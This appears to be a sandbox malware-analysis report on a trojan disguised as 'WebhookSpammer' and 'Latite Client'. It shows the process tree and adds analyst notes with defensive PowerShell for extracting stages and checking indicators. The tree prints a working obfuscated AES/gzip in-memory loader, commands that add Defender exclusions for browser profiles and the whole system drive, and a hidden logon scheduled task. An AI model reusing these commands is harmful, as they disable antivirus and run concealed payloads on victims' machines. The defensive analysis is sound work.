                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2140 /prefetch:2
                                                        11⤵
                                                          PID:2764
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2116 /prefetch:2
                                                          11⤵
                                                            PID:1604
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2384 /prefetch:2
                                                            11⤵
                                                              PID:2280
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2128 /prefetch:2
                                                              11⤵
                                                                PID:2724
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4460 /prefetch:2
                                                                11⤵
                                                                  PID:2300
                                                        • C:\Windows\coolhi.exe
                                                          "C:\Windows\coolhi.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:5064
                                                          • C:\Windows\coolhi.exe
                                                            "C:\Windows\coolhi.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:1656
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default'"
                                                              9⤵
                                                                PID:1536
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default'
                                                                  10⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:5076
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles'"
                                                                9⤵
                                                                  PID:4516
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles'
                                                                    10⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:3768
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "ver"
                                                                  9⤵
                                                                    PID:1896
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV1.bat" "
                                                              6⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:2092
                                                              • C:\Windows\system32\net.exe
                                                                net file
                                                                7⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3708
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 file
                                                                  8⤵
                                                                    PID:3464
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                   "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnQ+LJ8uABbHbXAO4FuFVPGKynZ/3LF7hH8th9C5LeY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Giel7QVtc7MgczVdodu2Dw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $LluQH=New-Object System.IO.MemoryStream(,$param_var); $RYzDP=New-Object System.IO.MemoryStream; $FvOhk=New-Object System.IO.Compression.GZipStream($LluQH, [IO.Compression.CompressionMode]::Decompress); $FvOhk.CopyTo($RYzDP); $FvOhk.Dispose(); $LluQH.Dispose(); $RYzDP.Dispose(); $RYzDP.ToArray();}function execute_function($param_var,$param2_var){ $oYKjg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ccxBj=$oYKjg.EntryPoint; $ccxBj.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV1.bat';$wXwUA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV1.bat').Split([Environment]::NewLine);foreach ($wtvna in $wXwUA) { if ($wtvna.StartsWith(':: ')) { $cIlpE=$wtvna.Substring(3); break; }}$payloads_var=[string[]]$cIlpE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                  7⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Modifies registry class
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:4864
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_670_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_670.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                    8⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:2692
                                                                  • C:\Windows\System32\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_670.vbs"
                                                                    8⤵
                                                                    • Checks computer location settings
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1888
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_670.bat" "
                                                                      9⤵
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:4604
                                                                      • C:\Windows\system32\net.exe
                                                                        net file
                                                                        10⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:668
                                                                        • C:\Windows\system32\net1.exe
                                                                          C:\Windows\system32\net1 file
                                                                          11⤵
                                                                            PID:2280
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                           "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnQ+LJ8uABbHbXAO4FuFVPGKynZ/3LF7hH8th9C5LeY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Giel7QVtc7MgczVdodu2Dw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $LluQH=New-Object System.IO.MemoryStream(,$param_var); $RYzDP=New-Object System.IO.MemoryStream; $FvOhk=New-Object System.IO.Compression.GZipStream($LluQH, [IO.Compression.CompressionMode]::Decompress); $FvOhk.CopyTo($RYzDP); $FvOhk.Dispose(); $LluQH.Dispose(); $RYzDP.Dispose(); $RYzDP.ToArray();}function execute_function($param_var,$param2_var){ $oYKjg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ccxBj=$oYKjg.EntryPoint; $ccxBj.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_670.bat';$wXwUA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_670.bat').Split([Environment]::NewLine);foreach ($wtvna in $wXwUA) { if ($wtvna.StartsWith(':: ')) { $cIlpE=$wtvna.Substring(3); break; }}$payloads_var=[string[]]$cIlpE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                          10⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:4456
                                                                          • C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV1.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV1.exe"
                                                                            11⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • Drops file in Windows directory
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:4040
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAbgB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAeAB0ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAcwBvAHIAcgB5ACAAZABvAHcAbgAgAGYAbwByACAAbgBvAHcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGQAaQBlACMAPgA="
                                                                              12⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:4912
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                13⤵
                                                                                  PID:4372
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAagBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAcQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAbgBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAawB6ACMAPgA="
                                                                                12⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:664
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  13⤵
                                                                                    PID:4464
                                                                                • C:\Windows\Latite_Client_betterV1.exe
                                                                                  "C:\Windows\Latite_Client_betterV1.exe"
                                                                                  12⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4348
                                                          • C:\ProgramData\Latite_Client_betterV1.exe
                                                            C:\ProgramData\Latite_Client_betterV1.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:3632
                                                          • C:\ProgramData\WebhookSpammerV5.exe
                                                            C:\ProgramData\WebhookSpammerV5.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:4368
                                                          • C:\ProgramData\Latite_Client_betterV1.exe
                                                            C:\ProgramData\Latite_Client_betterV1.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:3108
                                                          • C:\ProgramData\WebhookSpammerV5.exe
                                                            C:\ProgramData\WebhookSpammerV5.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:2188
                                                          • C:\ProgramData\Latite Client_BetterV3.exe
                                                            "C:\ProgramData\Latite Client_BetterV3.exe"
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:2280
                                                          • C:\ProgramData\WindowsDefender
                                                            C:\ProgramData\WindowsDefender
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:1444
                                                          • C:\Windows\explorer.exe
                                                            C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                            1⤵
                                                            • Modifies Internet Explorer settings
                                                            • Modifies registry class
                                                            • Suspicious behavior: AddClipboardFormatListener
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3068
                                                          • C:\Windows\System32\rundll32.exe
                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
                                                            1⤵
                                                              PID:4900
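Analyst note on the loader. The two long powershell.exe command lines in the tree (PIDs 4864 and 4456, launched from WebhookSpammerV1.bat and later from the persisted copy startup_str_670.bat) are the whole stager: the script reads the .bat that launched it, takes the first line beginning with `:: ` (a batch comment, so cmd.exe skips it), splits that line on `\`, base64-decodes each part, decrypts it with AES-256-CBC/PKCS7 under a key and IV hard-coded in the command line, gunzips the result and loads it with `[Reflection.Assembly]::Load`, invoking the entry point of the first stage with `$null` and of the second with an empty `string[]`. Method names are hidden by reversing string literals at run time (`'gnirtS46esaBmorF'[-1..-16] -join ''` is `FromBase64String`; `'daoL'` is `Load`; `'txeTllAdaeR'` is `ReadAllText`). The `net file` that precedes each loader (PIDs 3708 and 668) is commonly used in batch droppers as an elevation probe, since it fails unless the shell is elevated, and the later `Register-ScheduledTask ... -RunLevel Highest` needs exactly that.

The script below is an added example, not code from the report or from the sample: it reproduces the loader's decode, decrypt and decompress steps with the key and IV shown above, but writes each recovered stage to disk instead of loading it, so nothing executes. `$BatPath` and `$OutDir` are the analyst's own choices; the function names and the `stage<n>.bin` naming are this example's, not the loader's.

```powershell
# Offline stage extractor for the ':: '-line batch loader seen in this report (added example).
# Key/IV are the values hard-coded in the loader's command line; everything else here is ours.
$LoaderKey = [Convert]::FromBase64String('QnQ+LJ8uABbHbXAO4FuFVPGKynZ/3LF7hH8th9C5LeY=')  # 32 bytes -> AES-256
$LoaderIV  = [Convert]::FromBase64String('Giel7QVtc7MgczVdodu2Dw==')                      # 16 bytes

function Unprotect-LoaderStage {
    # AES-256-CBC with PKCS7 padding, mirroring the loader's decrypt_function.
    param([byte[]]$CipherText, [byte[]]$Key, [byte[]]$IV)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = $Key
    $aes.IV  = $IV
    $dec = $aes.CreateDecryptor()
    try     { $plain = $dec.TransformFinalBlock($CipherText, 0, $CipherText.Length) }
    finally { $dec.Dispose(); $aes.Dispose() }
    ,$plain   # unary comma stops the pipeline from unrolling the byte[]
}

function Expand-LoaderStage {
    # GZip decompression, mirroring the loader's decompress_function.
    param([byte[]]$Data)
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    try     { $gz.CopyTo($out) }
    finally { $gz.Dispose(); $in.Dispose() }
    $bytes = $out.ToArray()
    $out.Dispose()
    ,$bytes
}

function Export-LoaderStages {
    # Finds the ':: ' payload line, recovers every '\'-separated blob and writes it to $OutDir.
    # Returns one record per stage so the hashes can be compared with the dropped executables.
    param([Parameter(Mandatory)][string]$BatPath, [string]$OutDir = '.\stages')
    $line = $null
    foreach ($l in [IO.File]::ReadLines((Resolve-Path -LiteralPath $BatPath).ProviderPath)) {
        if ($l.StartsWith(':: ')) { $line = $l; break }
    }
    if (-not $line) { throw "No ':: ' payload line found in $BatPath" }
    $blobs = $line.Substring(3).Split('\')
    New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
    for ($i = 0; $i -lt $blobs.Length; $i++) {
        $cipher = [Convert]::FromBase64String($blobs[$i])
        $stage  = Expand-LoaderStage (Unprotect-LoaderStage $cipher $LoaderKey $LoaderIV)
        $dest   = Join-Path $OutDir ('stage{0}.bin' -f $i)
        [IO.File]::WriteAllBytes($dest, $stage)
        [pscustomobject]@{
            Index  = $i
            Bytes  = $stage.Length
            IsPE   = ($stage.Length -gt 1 -and $stage[0] -eq 0x4D -and $stage[1] -eq 0x5A)  # 'MZ' header
            SHA256 = (Get-FileHash -LiteralPath $dest -Algorithm SHA256).Hash
            Path   = $dest
        }
    }
}

# Usage (path is an assumption; point it at the extracted WebhookSpammerV1.bat or startup_str_670.bat):
# Export-LoaderStages -BatPath 'C:\cases\WebhookSpammerV1.bat' -OutDir 'C:\cases\stages' | Format-Table -AutoSize
```

Stage order matters when reading the output: `stage0.bin` is the assembly the loader invokes first with no arguments, `stage1.bin` the one it calls with an empty `string[]`, i.e. a normal `Main(string[] args)`. If a stage fails to decrypt, check that the .bat was extracted with its original line endings: the loader splits on `[Environment]::NewLine`, and a re-saved file with different endings still works for the loader but can leave the payload line wrapped in an editor.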
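Two further points a responder takes from this tree. First, the two `-EncodedCommand` invocations under WebhookSpammerV1.exe (PIDs 4912 and 664) are base64 over UTF-16LE text padded with empty `<# ... #>` block comments, which is what the Command Obfuscation signature is flagging; decoded, the first shows a "sorry down for now" message box through System.Windows.Forms and the second runs `Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force`, excluding the whole system drive and user profile from Defender scanning, on top of the Chrome and Firefox profile exclusions added earlier by coolhi.exe. Second, persistence is a logon-triggered scheduled task named `RuntimeBroker_startup_670_str` that runs `%APPDATA%\startup_str_670.vbs`, which relaunches the .bat loader.

The script below is an added triage helper, not part of the report: it decodes such encoded commands with the comment padding stripped, and checks a live host for the exclusions, task and dropped files this tree shows. The indicator list comes only from this report; the host checks assume the Defender and ScheduledTasks modules (Windows 8/Server 2012 or later) and an elevated shell.

```powershell
# Added triage helper for the behaviours in this report; nothing here is the sample's own code.

function ConvertFrom-EncodedCommand {
    # powershell.exe -EncodedCommand takes base64 of UTF-16LE text; <# #> comments carry no
    # semantics and are removed so the real command is visible.
    param([Parameter(Mandatory)][string]$Base64)
    $text = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
    (($text -replace '<#.*?#>', '') -replace '\s{2,}', ' ').Trim()
}

# The two encoded strings from the tree (PIDs 4912 and 664), copied verbatim from the report.
$EncodedCommandsFromReport = @(
    'PAAjAHAAbgB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAeAB0ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAcwBvAHIAcgB5ACAAZABvAHcAbgAgAGYAbwByACAAbgBvAHcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGQAaQBlACMAPgA=',
    'PAAjAHAAagBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAcQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAbgBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAawB6ACMAPgA='
)

function Test-ReportIndicators {
    # Returns one record per matching exclusion, scheduled task or dropped file on this host.
    $hits = New-Object System.Collections.Generic.List[object]

    # Defender exclusions: Chrome/Firefox profile paths, then %UserProfile% and %SystemDrive%.
    $prefs = Get-MpPreference -ErrorAction Stop
    foreach ($p in @($prefs.ExclusionPath)) {
        if ($p -and ($p -match 'Google\\Chrome\\User Data|Mozilla\\Firefox\\Profiles' -or
                     $p -eq $env:USERPROFILE -or $p -eq $env:SystemDrive)) {
            $hits.Add([pscustomobject]@{ Type = 'DefenderExclusion'; Value = $p })
        }
    }

    # Persistence: logon task RuntimeBroker_startup_<n>_str running %APPDATA%\startup_str_<n>.vbs.
    foreach ($t in @(Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        $exec = ($t.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
        if ($t.TaskName -like 'RuntimeBroker_startup_*' -or $exec -match 'startup_str_\d+\.(vbs|bat)') {
            $hits.Add([pscustomobject]@{ Type = 'ScheduledTask'; Value = "$($t.TaskName) -> $exec" })
        }
    }

    # Files the tree shows being dropped and executed.
    $paths = @(
        'C:\Windows\coolhi.exe',
        'C:\Windows\Latite_Client_betterV1.exe',
        'C:\ProgramData\WindowsDefender',
        'C:\ProgramData\Latite_Client_betterV1.exe',
        'C:\ProgramData\Latite Client_BetterV3.exe',
        'C:\ProgramData\WebhookSpammerV5.exe',
        (Join-Path $env:APPDATA 'startup_str_670.vbs'),
        (Join-Path $env:APPDATA 'startup_str_670.bat')
    )
    foreach ($f in $paths) {
        if (Test-Path -LiteralPath $f) {
            $hits.Add([pscustomobject]@{ Type = 'DroppedFile'; Value = $f })
        }
    }
    $hits
}

# Usage:
#   $EncodedCommandsFromReport | ForEach-Object { ConvertFrom-EncodedCommand $_ }
#   Test-ReportIndicators | Format-Table -AutoSize
```

The task and file names carry the number 670 in this run; the regexes match any number because the loader embeds it in the names it generates, and a different execution may produce a different suffix. Unregister the task and remove the exclusions (`Remove-MpPreference -ExclusionPath ...`) before pulling the dropped files, otherwise Defender still ignores the paths while they are being collected.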

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Downloads

                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                              Filesize

                                                              3KB

                                                              MD5

                                                              661739d384d9dfd807a089721202900b

                                                              SHA1

                                                              5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                              SHA256

                                                              70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                              SHA512

                                                              81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\7a4cbb3f-9de5-43f8-8d07-ea9c37410df9.dmp

                                                              Filesize

                                                              974KB

                                                              MD5

                                                              6b406de1dada7b2f13fcd9087e344b7c

                                                              SHA1

                                                              aa27d5d524256dfd24662730e0aa43227c826c69

                                                              SHA256

                                                              96a00f8eb613a780b438aebbdecd4a69e737abd50a4002fc060ebdda7ee937c8

                                                              SHA512

                                                              2957cfc3fac5de6b11e99c426e027e4b4db7e7881c68aba4e1c23224ce65123630c28a7edaaa2d32d2cde712a365c343d79b431d16d9370adfeacfb096cb0ed8

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\7aabdb95-1b8d-4da4-8445-aeb9e6a8984c.dmp

                                                              Filesize

                                                              978KB

                                                              MD5

                                                              9e8fb6887306a49e0e453d57436cfbbb

                                                              SHA1

                                                              b521b98c180dd437769700438e52212c80e222e9

                                                              SHA256

                                                              aca2aadef4152651c3e2900f37dd32664dc3a07c69005c1b369277ca20873707

                                                              SHA512

                                                              a986500eaf2d8c674cf665ee1ee54a6971c541e5ded75aa48009c9c20f05154b2fdf3038cbc345fadffbba861c3c02fa9196a4c9a9409f42524bd0576bc319c8

• C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\7fa19ca8-1dd4-40da-8545-4d49b04334c7.dmp
  Filesize  978KB
  MD5       b75da7d1d79f6bab34c1486e70c57db2
  SHA1      f30150ee82938853f876c48d19b7ff66dbc76aba
  SHA256    3102f0f1a046e634212d54a7abfa4a20af22e53e02471343c548e2b2bb50a4f8
  SHA512    40b2265aa57ce034d49b56bd59e297067cacf8894aeee1609661c491d560baae5cdb091459d3de1326814be44e1886fac8adbd2c189fbf2bd9bde6305d28f8f1

• C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\b1b8771a-ec99-4116-bfa1-1e4cdbfe699a.dmp
  Filesize  978KB
  MD5       0f279faaa3743fcc8885b8f1babf3988
  SHA1      84e4c017c94e3e2504b10628d9674db680bba755
  SHA256    bccdec58ff11848fb93dba125bd0272672d6dab8cc57bdbcb78973351b6656c7
  SHA512    4e742510960f58793c696f3a9ca49703669d9a5e4639943fef884fd57dd08545f1135b6049385911fbe35ab5c1f8827c6096667c8325e12dde392a198621bf49

